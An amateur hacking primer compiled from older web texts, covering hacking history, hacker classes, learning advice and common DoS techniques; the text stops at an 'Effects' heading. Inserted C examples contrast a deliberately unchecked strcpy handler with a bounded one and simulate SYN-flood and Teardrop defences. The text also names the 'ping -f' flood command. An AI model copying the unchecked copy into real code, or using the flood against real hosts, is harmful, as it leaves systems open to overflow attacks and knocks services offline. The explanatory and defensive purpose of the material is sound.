
Hacking


Index
* Evolution of Hacking
* Hacking
* Introduction To Cyber Crime
* Special Attraction
* Viruses
* Hacking XP
* Glossary
* Prepared By


Evolution of Hacking
Astonishingly, hacking did not begin as an anti-social activity. The entire story of hacking started with the belief that there is always more than one way to solve a problem. People also wanted to access information free of cost at any time.

Computer hacking started in the late 1950s. Before that, computers and programming languages were not easily accessible. Problems were solved by repeating known and successful computing methods. To work on computers, people needed formally stated problems and predesigned solutions. Computers were allotted to professionals based on the priority of their requirements. The restricted use of computer resources reduced the chances for any experiments with early computers.

The authorities of the Massachusetts Institute of Technology (MIT) allowed people to access their TX-0 resources without any restrictions after official hours. That was the first time computer users got a chance to experiment with different methods for solving problems; in other words, that was the beginning of the hacker community. The prime aim of those hackers was to experiment with new solutions without any malicious intent. The early hackers performed their activities with a strong belief that there is always room for enhancement, and they worked without any predefined structure or time schedule.

In parallel to computer hacking, a new type of hacker, the phreak, came into existence. Phreaks first accessed telephone networks by using handheld electronic devices. Phreaks used those devices to make modifications to pay telephones so as to make free telephone calls. To simulate coin payments in pay telephones, they used devices such as red boxes.

In the early 1980s, a new computing era started when computers and telephone networks were connected with the help of modems. Personal computers became popular, and users started to use modems and telephone networks to connect personal computers to mainframe computers.
Access to computers connected to the Internet opened the entire world of computing to the hacker community. The rapid growth of Internet technologies changed the profile of hackers.


Index
* What Is Hacking?
* How Do Hackers Hack?
* Classes Of Hackers
* How To Become A Hacker
* Common Hacking Techniques
* Passwords
* Sniffers: Basics and Detection


What is Hacking?
Hacking is an act of penetrating computer systems to gain knowledge about the system and how it works.

What are Hackers?
Technically, a hacker is someone who is enthusiastic about computer programming and all things relating to the technical workings of a computer. Such a definition presents the term in a more positive light than is usually associated with it. Most people understand a hacker to be what is more accurately known as a 'cracker'.

What are Crackers?
Crackers are people who try to gain unauthorized access to computers. This is normally done through the use of a 'backdoor' program installed on your machine. A lot of crackers also try to gain access to resources through the use of password cracking software, which tries billions of passwords to find the correct one for accessing a computer.

What damage can a Hacker do?
This depends upon what backdoor program(s) are hiding on your PC. Different programs can do different amounts of damage. However, most allow a hacker to smuggle another program onto your PC. This means that if a hacker can't do something using the backdoor program, he can easily put something else onto your computer that can. Hackers can see everything you are doing and can access any file on your disk. Hackers can write new files, delete files, edit files, and do practically anything to a file that a legitimate user could do. A hacker could install several programs on your system without your knowledge. Such programs could also be used to steal personal information such as passwords and credit card information.


How do Hackers hack?
There are many ways in which a hacker can hack. Some are as follows:
* NetBIOS
* ICMP Ping
* FTP
* rpc.statd
* HTTP

NetBIOS
NetBIOS hacks are the worst kind, since they don't require you to have any hidden backdoor program running on your computer. This kind of hack exploits a bug in Windows 9x. NetBIOS is meant to be used on local area networks, so machines on that network can share information. Unfortunately, the bug is that NetBIOS can also be used across the Internet - so a hacker can access your machine remotely.

ICMP Ping (Internet Control Message Protocol)
ICMP is one of the main protocols that make the Internet work. It stands for Internet Control Message Protocol. 'Ping' is one of the commands that can be sent to a computer using ICMP. Ordinarily, a computer would respond to this ping, telling the sender that the computer does exist. This is all pings are meant to do. Pings may seem harmless enough, but a large number of pings can constitute a Denial-of-Service attack, which overloads a computer. Also, hackers can use pings to see if a computer exists and does not have a firewall (firewalls can block pings). If a computer responds to a ping, the hacker could then launch a more serious form of attack against that computer.

FTP (File Transfer Protocol)
FTP is a standard Internet protocol, standing for File Transfer Protocol. You may use it for file downloads from some websites. If you have a web page of your own, you may use FTP to upload it from your home computer to the web server. However, FTP can also be used by some hackers. FTP normally requires some form of authentication for access to private files, or for writing to files. FTP backdoor programs, such as
* Doly Trojan
* Fore
* Blade Runner
simply turn your computer into an FTP server, without any authentication.

Rpc.Statd
This is a problem specific to Linux and Unix. The problem is the infamous unchecked buffer overflow problem. This is where a fixed amount of memory is set aside for storage of data. If data is received that is larger than this buffer, the program should truncate the data or send back an error, or at least do something other than ignore the problem. Unfortunately, the data overflows the memory that has been allocated to it, and the data is written into parts of memory it shouldn't be in. This can cause crashes of various different kinds. However, a skilled hacker could write bits of program code into memory that may be executed to perform the hacker's evil deeds.

HTTP
HTTP stands for HyperText Transfer Protocol. HTTP hacks can only be harmful if you are using Microsoft web server software, such as Personal Web Server. There is a bug in this software called an 'unchecked buffer overflow'. If a user requests a file on the web server with a very long name, part of the request gets written into parts of memory that contain active program code. A malicious user could use this to run any program they want on the server.
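The unchecked copy described for rpc.statd and for the long-file-name HTTP request, beside a bounded version, as an added C example that is not from the original page; the buffer size, the function names and the "refuse rather than truncate" policy are assumptions made for the illustration.

```c
#include <stdio.h>
#include <string.h>

#define NAME_BUF_LEN 32   /* fixed amount of memory set aside for the name (assumed size) */

/* Vulnerable form: the requested name is copied without checking its length.
 * A request longer than NAME_BUF_LEN - 1 bytes writes past 'name' into
 * whatever the compiler placed next to it on the stack: the unchecked
 * buffer overflow. Shown for reading; nothing below calls it with an
 * oversized input. */
void handle_request_unchecked(const char *requested)
{
    char name[NAME_BUF_LEN];
    strcpy(name, requested);          /* no bound check: the defect */
    printf("serving %s\n", name);
}

/* Hardened form: measure the input against the buffer before copying and
 * refuse anything that does not fit. Silent truncation would also be wrong
 * for a file name, since it changes which file gets served.
 * Returns 0 on success, -1 for an empty name or one that is too long. */
int handle_request_checked(const char *requested, char *out, size_t out_len)
{
    /* memchr stops at the first NUL, so it never reads past the terminator */
    const char *nul = memchr(requested, '\0', out_len);
    if (nul == NULL)                  /* no terminator within out_len bytes */
        return -1;
    size_t n = (size_t)(nul - requested);
    if (n == 0)
        return -1;
    memcpy(out, requested, n + 1);    /* bounded copy including the NUL */
    return 0;
}

/* Demonstration helper: does a constructed name of 'len' bytes pass the
 * checked path? Returns 0 (accepted) or -1 (refused). */
int request_fits(size_t len)
{
    char name[NAME_BUF_LEN];
    char tmp[512];                    /* constructed oversized request */
    if (len >= sizeof tmp)
        return -1;
    memset(tmp, 'A', len);
    tmp[len] = '\0';
    return handle_request_checked(tmp, name, sizeof name);
}

/* Demonstration helper: the checked path delivers the name unchanged. */
int checked_copy_matches(const char *requested)
{
    char name[NAME_BUF_LEN];
    if (handle_request_checked(requested, name, sizeof name) != 0)
        return 0;
    return strcmp(name, requested) == 0;
}

int main(void)
{
    handle_request_unchecked("index.html");                        /* short name: no overflow */
    printf("31-byte name accepted: %d\n", request_fits(31) == 0);  /* 1 */
    printf("32-byte name refused:  %d\n", request_fits(32) == -1); /* 1 */
    printf("500-byte name refused: %d\n", request_fits(500) == -1);/* 1 */
    return 0;
}
```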


Classes of Hackers
Today, it is very difficult to distinguish between hackers, crackers, and script kiddies. Therefore, hackers have been categorized into different groups based on the nature of their tricks:
* White hats
* Black hats
* Gray hats

White Hats
White hat hackers use their skills and knowledge for good purposes. These hackers help to find out new security vulnerabilities and their solutions. White hats do not hack systems with any bad intent. They like experimenting and believe that there is always a better solution than the current one. White hat hackers always report the vulnerabilities they discover to the concerned security professionals. For example, a hacker who finds a weakness in a system and helps the system administrator to implement better security measures is a white hat hacker.

Black Hats
Black hat hackers perform their activities with bad intentions. Black hats perform illegal activities, such as destroying data, denying services to legitimate users, and defacing Web sites. For example, a hacker who breaks into the network of a bank and steals thousands of dollars by transferring it to other banks is a black hat. Black hat hackers share their experiments with other crackers but not with the concerned security professionals.

Gray Hats
Gray hat hackers are those people who do not believe in categorizing hacking activities as good or bad. Gray hats believe that some of the activities, which are condemned by white hats, are harmless. Gray hat hackers might share the results of their experiments with both security professionals and crackers.


The Hacker Attitude
Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude. But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. They're also important because becoming the kind of person who believes these things is important, for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mind-set of masters -- not just intellectually but emotionally as well. (lots of these on alt.2600.hgackerz) So, if you want to be a hacker, repeat the following things until you believe them:

1. The world is full of fascinating problems waiting to be solved.
Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, in pushing themselves past their own physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence. If you aren't the kind of person that feels this way naturally, you'll need to become one in order to make it as a hacker. Otherwise you'll find your hacking energy is sapped by distractions like sex, money, and social approval. ( so I would take it all hackers are wankers lol ) You also have to develop a kind of faith in your own learning capacity -- a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the next piece -- and so on, until you're done. ( I agree )

2. Nobody should ever have to solve a problem twice.
Creative brains are a valuable, limited resource. They shouldn't be wasted on reinventing the wheel when there are so many fascinating new problems waiting out there. To behave like a hacker, you have to believe that the thinking time of other hackers is precious -- so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones. (You don't have to believe that you're obligated to give all your creative product away, though the hackers that do that get the most respect from other hackers. It's definitely OK to sell enough of it to keep you in food and rent and computers. It's OK to use your hacking skills to support a family or even get rich, as long as you don't forget you're a hacker while you're doing it.)

3. Boredom and drudgery are evil.
Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing what only they can do -- solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil. To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers). (There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring as a mind-clearing exercise, or in order to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice -- nobody who can think should ever be forced into boredom.)

4. Freedom is good.
Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by -- and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers. (This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.) Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing -- they only like cooperation that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief.

5. Attitude is no substitute for competence.
To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work. Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence -- especially competence at hacking, but competence at anything is good. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best. If you revere competence, you'll enjoy developing it in yourself -- the hard work and dedication will become a kind of intense play rather than drudgery. And that's vital to becoming a hacker.


How To Become A Hacker
Looking for advice on learning to crack passwords, sabotage systems, mangle websites, write viruses, and plant Trojan horses? You came to the wrong place. Looking for advice on how to learn the guts and bowels of a system or network, get inside it, and become a real expert? Maybe I can help there. How you use this knowledge is up to you. I hope you'll use it to contribute to computer science and hacking (in its good sense), not to become a cracker or vandal. This little essay is basically the answers to all the emails I get asking how to become a hacker. It's not a tutorial in and of itself. It's certainly not a guaranteed success. Just give it a try and see what happens. That said, here's where to start:

Be curious
Take things apart. Look under the hood. Dig through your system directories and see what's in there. View the files with hex editors. Look inside your computer. Wander around computer stores and look at what's there.

Read everything in sight
If you can afford it, buy lots of books. If you can't, spend time in libraries and online. Borrow books from friends. Go through tutorials. Read the help files on your system. If you're using Unix/Linux, read the man files. Check out the local college bookstores and libraries. And as you're reading, try things (see next paragraph).

Experiment
Don't be afraid to change things, just to see what'll happen. Do this long enough, of course, and you'll wipe out your system (see next paragraph), but that's part of becoming a hacker. Try command options and switches you've never tried before. Look for option menus on programs and see what they can do. In Windows, tweak your registry and see what happens. Change settings in .INI files. In Unix, dig around in the directories where you don't normally go. On the Macintosh, play around in the system folder.

Make backups
If you start mucking around with system files, registries, password files, and such, you will eventually destroy your system. Have a backup ready. If you can afford it, have a system you use just for experimenting, ready to reload on a moment's notice, and do your serious work (or serious gaming!) on a different computer.

Don't limit yourself
Who says a computer or network is the only place to hack? Take apart your telephone. Figure out your television (careful of the high voltage around the picture tube - if you fry yourself, it's not my fault) and VCR. Figure out how closed captioning works (that was a plug for my CaptionCentral.com Web site). Take apart your printer. Pick up the latest issues of Nuts & Volts and Midnight Engineer (you've obviously made a good start if you're reading Blacklisted! 411). Take apart the locks on your doors. Figure out how your radio works. Be insatiably curious and read voraciously. There are groups you can learn from. There are whole Web sites devoted to hacking TiVo units, for example.

Get some real tools
You can't cut a board in half with a screwdriver. Well, maybe you can, but it'll take a long time. Dig around and find the proper tools for the operating systems you're using. They're out there on the Web. You can get some pretty good stuff as shareware or freeware (especially on Linux). The serious power tools often cost serious money. What kinds of tools? Hex file editors. Snoopers that analyze system messages and network traffic. Compilers and APIs for programming. Scripting tools. Disk editors/formatters. Disassemblers. When you get good, write some of your own.

Learn to program
If you want to be a hacker, you're going to have to learn to program. The easiest way to start depends on the operating system you're using. The choice of language is very individual. It's almost a religious thing. Suggest a programming language to a beginner, and someone will disagree. Heck, you'll probably get flamed for it in a newsgroup. In Unix, I'd suggest getting started with Perl. Buy a copy of the camel book (Programming Perl) and the llama book (Learning Perl). You'll have the fundamentals of programming really fast! The best part is that the language itself is free. In Windows, you can get started quickly using a visual development environment like Visual Basic or Java. No matter what the system, if you want to get serious, you'll eventually need to learn C (or C++ or C# or some other variant). Real hackers know more than one programming language, anyway, because no one language is right for every task.

Learn to type
Hackers spend a lot of time at their keyboards. I type 90+ wpm (according to the Mavis Beacon typing tutor). HackingWiz (of hackers.com and Hacker's Haven BBS fame) says he can type 140+ wpm. The typing tutor may be boring, but it pays off.

Use real operating systems
Windows 95/98/Me is a shell on top of a 32-bit patch to a 16-bit DOS. Get some real operating systems (Linux, Windows NT, Mac OS, OS/2...) and learn them. You can't call yourself a linguist if you only know one language, and you certainly can't call yourself a hacker if you only know one OS. Linux is a hacker's dream. All the source code is freely available. Play with it, analyze it, learn it. Eventually, perhaps you can make a contribution to Linux yourself. Who knows, you might even have a chance to write your own OS.

Talk to people
It's hard to learn in a vacuum. Take classes. Join users groups or computer clubs. Talk to people on IRC or newsgroups or Web boards until you find people to learn with. That can take a while. Every third message on newsgroups like alt.hack* is "teach me to hack." Sigh. The best way to be accepted in any group is to contribute something. Share what you learn, and others will share with you.

Do some projects
It's important to pick some projects and work until you've finished them. Learning comes from doing, and you must follow the project through start to finish to really understand it. Start really simple. Make an icon. Customize your system (the startup screen on Win95, or the prompt on Unix). Make a script that performs some common operation. Write a program that manipulates a file (try encrypting something).

Learn to really use the Internet
Start with the Web. Read the help for the search engines. Learn how to use Boolean searches. Build up an awesome set of bookmarks. Then move on to other Internet resources. Get on Usenet. Find some underground BBSs. Get on IRC. You'll find useful information in the strangest places. Get to the point where you can answer your own questions. It's a whole lot faster than plastering them all over various newsgroups and waiting for a serious answer.

Once you've gone through these steps, go out and contribute something. The Internet was built by hackers. Linux was built by hackers. Usenet was built by hackers. Sendmail was built by hackers. Be one of the hackers that builds something.


Common Hacking Techniques
The various hacking techniques include:
* Denial-of-service
* Trojan Horses
* Spoofing
* Sniffing
* Password Cracking

Denial-Of-Service attacks

Methods of attack
A "denial-of-service" attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service. Examples include:
* Attempts to "flood" a network, thereby preventing legitimate network traffic;
* Attempts to disrupt a server by sending more requests than it can possibly handle, thereby preventing access to a service;
* Attempts to prevent a particular individual from accessing a service;
* Attempts to disrupt service to a specific system or person.
Attacks can be directed at any network device, including attacks on routing devices and Web, electronic mail, or Domain Name System servers.

A DoS attack can be perpetrated in a number of ways. There are three basic types of attack:
1. Consumption of computational resources, such as bandwidth, disk space, or CPU time;
2. Disruption of configuration information, such as routing information;
3. Disruption of physical network components.

In addition, the US-CERT has provided tips on the manifestations of DoS attacks:
* Unusually slow network performance (opening files or accessing web sites)
* Unavailability of a particular web site
* Inability to access any web site
* Dramatic increase in the number of spam emails received


SYN floods
A SYN flood sends a flood of TCP/SYN packets, often with a forged sender address. Each of these packets is handled like a connection request, causing the server to spawn a half-open connection by sending back a TCP/SYN-ACK packet and waiting for a TCP/ACK packet in response from the sender address. However, because the sender address is forged, the response never comes. These half-open connections consume resources on the server and limit the number of connections the server is able to make, reducing the server's ability to respond to legitimate requests until after the attack ends.

When a computer wants to make a TCP/IP connection (the most common Internet connection) to another computer, usually a server, an exchange of TCP/SYN and TCP/ACK packets occurs. The computer requesting the connection, usually the client's or user's computer, sends a TCP/SYN packet which asks the server if it can connect. If the server will allow connections, it sends a TCP/SYN-ACK packet back to the client to say "Yes, you may connect" and reserves a space for the connection, waiting for the client to respond with a TCP/ACK packet detailing the specifics of its connection. In a SYN flood the address of the client is often forged, so that when the server sends the go-ahead back to the client, the message is never received because the client either doesn't exist or wasn't expecting the packet and subsequently ignores it. This leaves the server with a dead connection, reserved for a client that will never respond. Usually this is done to one server many times in order to reserve all the connections for unresolved clients, which keeps legitimate clients from making connections.

The classic example is that of a party. Only 50 people can be invited to a party, and invitations are available on a first-come, first-served basis. Fifty letters are sent to request invitations, but the letters all have false return addresses. The invitations are mailed to the return addresses of the request letters. Unfortunately, all of the return addresses provided were fake, so nobody, or at least nobody of interest, receives the invitations. Now, when someone actually wants to come to the party (view the website), there are no invitations left because all the invitations (connections) have been reserved for 50 supposed people who will never actually show up.
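The half-open connection table that this passage describes, modelled as an added C example that is not from the original page: the backlog holds 50 entries like the party's 50 invitations, forged sources never send the final ACK, and a per-entry timeout is the assumed mitigation that eventually frees the slots. The struct and function names, the timeout value and the addresses are invented for the illustration.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define BACKLOG      50   /* half-open slots: the 50 invitations of the party */
#define SYN_TIMEOUT  3    /* seconds an entry waits for its ACK (assumed value) */

struct half_open {
    uint32_t src_addr;    /* source address claimed by the SYN (may be forged) */
    uint16_t src_port;
    int      expires_at;  /* second at which the entry is dropped if no ACK came */
    bool     in_use;
};

struct syn_backlog { struct half_open slot[BACKLOG]; };

/* Mitigation: release entries whose SYN-ACK was never answered in time. */
void backlog_expire(struct syn_backlog *b, int now)
{
    for (int i = 0; i < BACKLOG; i++)
        if (b->slot[i].in_use && b->slot[i].expires_at <= now)
            b->slot[i].in_use = false;
}

int backlog_half_open_count(const struct syn_backlog *b)
{
    int n = 0;
    for (int i = 0; i < BACKLOG; i++)
        n += b->slot[i].in_use ? 1 : 0;
    return n;
}

/* Step 1 as seen by the server: a SYN arrives, a slot is reserved and the
 * SYN-ACK goes back to the claimed source. Returns the slot index, or -1
 * when every slot is taken, i.e. this client is refused. */
int syn_received(struct syn_backlog *b, uint32_t src, uint16_t port, int now)
{
    backlog_expire(b, now);
    for (int i = 0; i < BACKLOG; i++) {
        if (!b->slot[i].in_use) {
            b->slot[i] = (struct half_open){ src, port, now + SYN_TIMEOUT, true };
            return i;
        }
    }
    return -1;
}

/* Step 3 as seen by the server: the final ACK arrives, the half-open entry
 * becomes an established connection and its slot is freed. Forged sources
 * never reach this step. Returns true if a matching entry existed. */
bool ack_received(struct syn_backlog *b, uint32_t src, uint16_t port)
{
    for (int i = 0; i < BACKLOG; i++) {
        struct half_open *h = &b->slot[i];
        if (h->in_use && h->src_addr == src && h->src_port == port) {
            h->in_use = false;
            return true;
        }
    }
    return false;
}

/* Constructed flood: BACKLOG SYNs from forged 10.0.0.x sources at t = 0,
 * none of which will ever ACK. */
static void forged_flood(struct syn_backlog *b)
{
    for (uint32_t i = 0; i < BACKLOG; i++)
        syn_received(b, 0x0A000000u + i, 40000, 0);
}

/* Half-open entries still held 'now' seconds after the flood began. */
int half_open_after_flood(int now)
{
    struct syn_backlog b = { 0 };
    forged_flood(&b);
    backlog_expire(&b, now);
    return backlog_half_open_count(&b);
}

/* A real client (which does ACK) tries at t = 1, during the flood, and again
 * at t = SYN_TIMEOUT, after the forged entries expire. Returns how many of
 * the two handshakes completed: only the second one. */
int real_client_successes(void)
{
    struct syn_backlog b = { 0 };
    forged_flood(&b);
    int ok = 0;
    if (syn_received(&b, 0xC0A80101u, 51000, 1) >= 0 &&
        ack_received(&b, 0xC0A80101u, 51000))
        ok++;
    if (syn_received(&b, 0xC0A80101u, 51001, SYN_TIMEOUT) >= 0 &&
        ack_received(&b, 0xC0A80101u, 51001))
        ok++;
    return ok;
}

int main(void)
{
    printf("half-open entries at t=2: %d\n", half_open_after_flood(2));   /* 50 */
    printf("half-open entries at t=3: %d\n", half_open_after_flood(3));   /* 0 */
    printf("real client handshakes:   %d\n", real_client_successes());    /* 1 */
    return 0;
}
```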


LAND attack
A LAND attack involves sending a spoofed TCP SYN packet (connection initiation) with the target host's IP address and an open port as both source and destination. The attack causes the targeted machine to reply to itself continuously and eventually crash.

ICMP floods
A smurf attack is one particular variant of a flooding DoS attack on the public Internet. It relies on misconfigured network devices that allow packets to be sent to all computer hosts on a particular network via the broadcast address of the network, rather than to a specific machine. The network then serves as a smurf amplifier. In such an attack, the perpetrators send large numbers of IP packets with the source address faked to appear to be the address of the victim. To combat Denial of Service attacks on the Internet, services like the Smurf Amplifier Registry have given network service providers the ability to identify misconfigured networks and to take appropriate action such as filtering.

A ping flood is based on sending the victim an overwhelming number of ping packets, usually using the "ping -f" command. It is very simple to launch, the primary requirement being access to greater bandwidth than the victim.

UDP floods
UDP floods include "Fraggle attacks". In a fraggle attack an attacker sends a large amount of UDP echo traffic to IP broadcast addresses, all of it having a fake source address. It is a simple rewrite of the smurf attack code.

Teardrop attack
The Teardrop attack involves sending IP fragments with overlapping, oversized payloads to the target machine. A bug in the TCP/IP fragmentation re-assembly code caused the fragments to be improperly handled, crashing the operating system as a result. Windows 3.1x, Windows 95 and Windows NT operating systems, as well as versions of Linux prior to 2.0.32 and 2.1.63, are vulnerable to this attack.

Application level floods
On IRC, IRC floods are a common electronic warfare weapon. Various DoS-causing exploits such as buffer overflow can cause server-running software to get confused and fill the disk space or consume all available memory or CPU time.

Other kinds of DoS rely primarily on brute force, flooding the target with an overwhelming flux of packets, oversaturating its connection bandwidth or depleting the target's system resources. Bandwidth-saturating floods rely on the attacker having higher bandwidth available than the victim; a common way of achieving this today is via Distributed Denial of Service, employing a botnet. Other floods may use specific packet types or connection requests to saturate finite resources by, for example, occupying the maximum number of open connections or filling the victim's disk space with logs. A "banana attack" is another particular type of DoS. It involves redirecting outgoing messages from the client back onto the client, preventing outside access, as well as flooding the client with the sent packets. An attacker with access to a victim's computer may slow it until it is unusable or crash it by using a fork bomb. A 'Pulsing zombie' is a term referring to a special denial-of-service attack. A network is subjected to hostile pinging by different attacker computers over an extended amount of time. This results in a degraded quality of service and increased workload for the network's resources. This type of attack is more difficult to detect than traditional denial-of-service attacks due to their surreptitious nature.
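The overlapping and oversized fragments of the Teardrop section above, handled by a reassembly sanity check, as an added C example that is not from the original page: fragments are validated before any payload is copied, and the function refuses the overlap that the vulnerable re-assembly code mishandled. Offsets are plain byte offsets rather than the 8-byte units of the real IP header, and the type and function names are invented.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define IP_MAX_DATAGRAM 65535u    /* largest IPv4 datagram the reassembler may build */

struct ip_fragment {
    uint32_t offset;         /* byte offset of this payload in the datagram (simplified) */
    uint32_t length;         /* payload bytes carried by this fragment */
    int more_fragments;      /* MF flag: 0 only on the last fragment */
};

enum frag_verdict { FRAG_OK, FRAG_TOO_LARGE, FRAG_OVERLAP, FRAG_GAP, FRAG_INCOMPLETE };

/* Validate fragments in arrival order before reassembling them. Rejects any
 * fragment reaching past the datagram limit, any pair whose byte ranges
 * intersect (the Teardrop case) and, once the last fragment has arrived, any
 * hole in the coverage of [0, total). Returns the first problem found. */
enum frag_verdict validate_fragments(const struct ip_fragment *f, size_t n)
{
    uint64_t covered = 0, total = 0;
    int have_last = 0;

    for (size_t i = 0; i < n; i++) {
        uint64_t a0 = f[i].offset, a1 = a0 + f[i].length;
        if (f[i].length == 0 || a1 > IP_MAX_DATAGRAM)
            return FRAG_TOO_LARGE;
        for (size_t j = 0; j < i; j++) {
            uint64_t b0 = f[j].offset, b1 = b0 + f[j].length;
            if (a0 < b1 && b0 < a1)          /* the two byte ranges intersect */
                return FRAG_OVERLAP;
        }
        covered += f[i].length;
        if (!f[i].more_fragments) {
            have_last = 1;
            total = a1;                      /* the last fragment fixes the size */
        }
    }
    if (!have_last)
        return FRAG_INCOMPLETE;              /* keep waiting (subject to a timer) */
    for (size_t i = 0; i < n; i++)
        if ((uint64_t)f[i].offset + f[i].length > total)
            return FRAG_TOO_LARGE;           /* data beyond the declared end */
    /* No overlaps and everything inside [0, total): coverage is complete
     * exactly when the lengths add up to total. */
    return covered == total ? FRAG_OK : FRAG_GAP;
}

/* Constructed fragment sets for the demonstration. */
enum frag_verdict check_sample(int which)
{
    static const struct ip_fragment good[]     = { {0, 1480, 1}, {1480, 1480, 1}, {2960, 500, 0} };
    static const struct ip_fragment teardrop[] = { {0, 1480, 1}, {1000, 800, 0} }; /* 2nd lands inside 1st */
    static const struct ip_fragment huge[]     = { {65000, 1000, 0} };
    static const struct ip_fragment hole[]     = { {0, 1000, 1}, {2000, 500, 0} };
    static const struct ip_fragment partial[]  = { {0, 1000, 1} };
    switch (which) {
    case 0:  return validate_fragments(good, 3);
    case 1:  return validate_fragments(teardrop, 2);
    case 2:  return validate_fragments(huge, 1);
    case 3:  return validate_fragments(hole, 2);
    default: return validate_fragments(partial, 1);
    }
}

int main(void)
{
    static const char *names[] = { "FRAG_OK", "FRAG_TOO_LARGE", "FRAG_OVERLAP",
                                   "FRAG_GAP", "FRAG_INCOMPLETE" };
    for (int i = 0; i < 5; i++)
        printf("sample %d: %s\n", i, names[check_sample(i)]);
    return 0;
}
```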

Nukes
Nukes are malformed or specially crafted packets. WinNuke is a type of nuke, exploiting a vulnerability in the NetBIOS handler in Windows 95. A string of out-of-band data is sent to TCP port 139 of the victim machine, causing it to lock up and display a Blue Screen of Death. This attack was very popular among IRC-dwelling script kiddies, due to the easy availability of a user-friendly click-and-crash WinNuke program.

Distributed attack
A distributed denial of service attack (DDoS) occurs when multiple compromised systems flood the bandwidth or resources of a targeted system, usually one or more web servers. These systems are compromised by attackers using a variety of methods. Malware can carry DDoS attack mechanisms; one of the better known examples of this was MyDoom. Its DoS mechanism was triggered on a specific date and time. This type of DDoS involved hardcoding the target IP address prior to release of the malware, and no further interaction was necessary to launch the attack.

A system may also be compromised with a trojan, allowing the attacker to download a zombie agent (or the trojan may contain one). Attackers can also break into systems using automated tools that exploit flaws in programs that listen for connections from remote hosts. This scenario primarily concerns systems acting as servers on the web.

Stacheldraht is a classic example of a DDoS tool. It utilizes a layered structure where the attacker uses a client program to connect to handlers, which are compromised systems that issue commands to the zombie agents, which in turn carry out the DDoS attack. Agents are compromised via the handlers by the attacker, using automated routines to exploit vulnerabilities in programs that accept remote connections running on the targeted remote hosts. Each handler can control up to a thousand agents. These collections of compromised systems are known as botnets. DDoS tools like Stacheldraht still use classic DoS attack methods centered around IP spoofing and amplification like smurf and fraggle attacks (these are also known as bandwidth consumption attacks). SYN floods (also known as resource starvation attacks) may also be used. Newer tools can use DNS servers for DoS purposes (see next section).

Unlike MyDoom's DDoS mechanism, botnets can be turned against any IP address. Script kiddies use them to deny the availability of well-known websites to legitimate users. More sophisticated attackers use DDoS tools for the purposes of extortion -- even against their business rivals.

It is important to note the difference between a DDoS and a DoS attack. If an attacker mounts a smurf attack from a single host it would be classed as a DoS attack. In fact, any attack against availability (e.g. using high-energy radio-frequency weapons to render computer equipment inoperable) would be classed as a Denial of Service attack, albeit an exotic one. On the other hand, if an attacker uses a thousand zombie systems to simultaneously launch smurf attacks against a remote host, this would be classed as a DDoS attack.

Reflected attack
A distributed reflected denial of service attack involves sending forged requests of some type to a very large number of computers that will reply to the requests. Using Internet protocol spoofing, the source address is set to that of the targeted victim, which means all the replies will go to (and flood) the target. ICMP Echo Request attacks (described above) can be considered one form of reflected attack, as the flooding host(s) send Echo Requests to the broadcast addresses of misconfigured networks, thereby enticing a large number of hosts to send Echo Reply packets to the victim. Some early DDoS programs implemented a distributed form of this attack. Many services can be exploited to act as reflectors, some harder to block than others. DNS amplification attacks involve a newer mechanism that increases the amplification effect, using a much larger list of DNS servers than seen earlier.

Unintentional attack
This describes a situation where a website ends up denied, not due to a deliberate attack by a single individual or group of individuals, but simply due to a sudden enormous spike in popularity. This can happen when an extremely popular website posts a prominent link to a second, less well-prepared site, for example as part of a news story. The result is that a significant proportion of the primary site's regular users (potentially hundreds of thousands of people) click that link in the space of a few hours, having the same effect on the target website as a DDoS attack. News sites and link sites (sites whose primary function is to provide links to interesting content elsewhere on the Internet) are most likely to cause this phenomenon. The canonical example is the Slashdot effect. Sites such as Digg, Fark, Something Awful and the webcomic Penny Arcade have their own corresponding "effects", known as "the Digg effect", "farking", "goonrushing" and "wanging" respectively. Routers have also been known to create unintentional DoS attacks, as both D-Link and Netgear routers have created NTP vandalism by flooding NTP servers without respecting the restrictions of client types or geographical limitations.

Incidents
The first major attack involving DNS servers as reflectors occurred in January 2001. The attack was directed at the site Register.com. This attack, which forged requests for the MX records of AOL.com (to amplify the attack), lasted about a week before it could be traced back to all attacking hosts and shut off. It used a list of tens of thousands of DNS servers that was at least a year old (at the time of the attack). In July 2002, the Honeynet Project Reverse Challenge was issued. The binary that was analyzed turned out to be yet another DDoS agent, which implemented several DNS-related attacks, including an optimized form of a reflection attack...


Effects
